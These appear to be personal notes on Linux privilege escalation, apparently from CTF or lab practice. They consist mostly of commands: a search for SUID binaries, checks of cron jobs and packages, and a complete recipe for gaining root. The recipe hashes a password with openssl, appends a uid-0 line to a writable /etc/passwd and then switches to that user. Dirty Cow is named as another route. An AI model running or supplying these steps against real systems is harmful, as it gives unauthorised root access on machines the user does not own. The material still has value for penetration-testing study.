Manual

Linux Priv Esc

• Dirty Cow • Rational Love

check passwd file perm -- editing passwd file AI WEB

? Exploiting SUID Executables -rws

find / -perm -u=s -type f 2>/dev/null

willl show the executables having suid bit set

find / -perm -4000 -type f 2>/dev/null

find / -perm -4000 -type f 2>/dev/null

looking for cronjobs cat /etc/cron.d if permissions denied look in cd /etc/cron.daily

look for installed packages dpkg -l

if passwd file writeable

salt is limited to 2 chars password is limited to 8 chars openssl passwd rks ^password openssl passwd -salt 12 rks ^2char salt to be added openssl passwd -1 rishabhkumar ^for md5 algo -- this allows us to put more than 8 char of password in output $1$ represnts md5 algo openssl passwd -1 -salt yoo12 rks@123 -1 for md5 -salt for salt at last password https://www.youtube.com/watch?v=RGOfw-uXaFw in linux the username is used to salt the password so your command is going to be like openssl passwd -1 -salt <username> <password> openssl passwd -1 -salt rks rks@123 will get a hash -- add this hash in shadow file or passwd file echo ‘$1$rks$blahblahahs:0:0:root:/root:/bin/bash’ >>/etc/passwd su rks rks@123 [as password] boom root